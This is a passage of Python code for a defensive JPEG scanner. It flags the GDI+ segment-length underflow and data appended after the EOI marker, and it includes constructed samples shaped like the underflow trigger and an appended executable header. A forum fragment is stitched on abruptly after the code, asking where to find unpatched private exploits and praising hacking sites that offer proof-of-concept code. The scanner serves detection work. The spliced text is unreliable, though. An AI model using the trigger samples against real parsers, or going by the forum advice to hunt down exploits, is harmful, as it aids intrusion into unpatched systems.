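        rep.findings.append(Finding(0, 0, "no SOI marker: not a JPEG"))
        return rep
    pos = 2
    while pos < len(data):
        start = pos
        if data[pos] != 0xFF:
            rep.findings.append(Finding(pos, 0, "garbage where a marker was expected"))
            return rep
        while pos < len(data) and data[pos] == 0xFF:  # 0xFF fill bytes are legal
            pos += 1
        if pos >= len(data):
            break
        marker = data[pos]
        pos += 1
        if marker == EOI:
            if pos != len(data):
                rep.findings.append(Finding(start, marker, f"{len(data) - pos} bytes appended after EOI"))
            return rep
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            rep.findings.append(Finding(start, marker, "truncated length field"))
            return rep
        declared = struct.unpack(">H", data[pos:pos + 2])[0]
        rep.segments.append((start, marker, declared))
        if declared < 2:
            # The length field counts its own two bytes. The vulnerable GDI+
            # parser computed the payload size as declared - 2 in an unsigned
            # variable, so 0 or 1 wrapped to a huge copy and overran the heap.
            rep.findings.append(Finding(start, marker, f"declared length {declared} < 2 (length underflow)"))
            return rep
        if pos + declared > len(data):
            rep.findings.append(Finding(start, marker, "segment runs past end of file"))
            return rep
        pos += declared
        if marker == SOS:
            pos = _skip_entropy_coded(data, pos)
    rep.findings.append(Finding(len(data), 0, "file ends without EOI"))
    return rep


# Constructed samples, not real images: a clean header, a COM segment shaped
# like the underflow trigger, and a clean file with bytes appended after EOI.
CLEAN = (b"\xFF\xD8"
         + b"\xFF\xE0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
         + b"\xFF\xFE" + struct.pack(">H", 4) + b"ok"
         + b"\xFF\xD9")
BAD_COM = b"\xFF\xD8" + b"\xFF\xFE\x00\x01" + b"\x90" * 32 + b"\xFF\xD9"
APPENDED = CLEAN + b"MZ\x90\x00"
```

Run `scan_jpeg` over files arriving in a temp or upload directory and quarantine anything whose report is `suspicious`; a real image never declares a segment length below 2 and never carries bytes after EOI.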
...know any places to find some good private exploits that wouldn't be patched? ...
I really only check out sites that have the POC available right there with the exploit. Here's a few hacking sites I'm rather fond of. Keep in mind, too, many times when something is heralded as being patched it hasn't actually been patched. People in general, including programmers, are just plain liars and lazy shits. The only way to find out for sure is to try it out on your own machine and test to see if it's really patched. You'd be surprised at how many exploits still work even though it's been advertised as patched.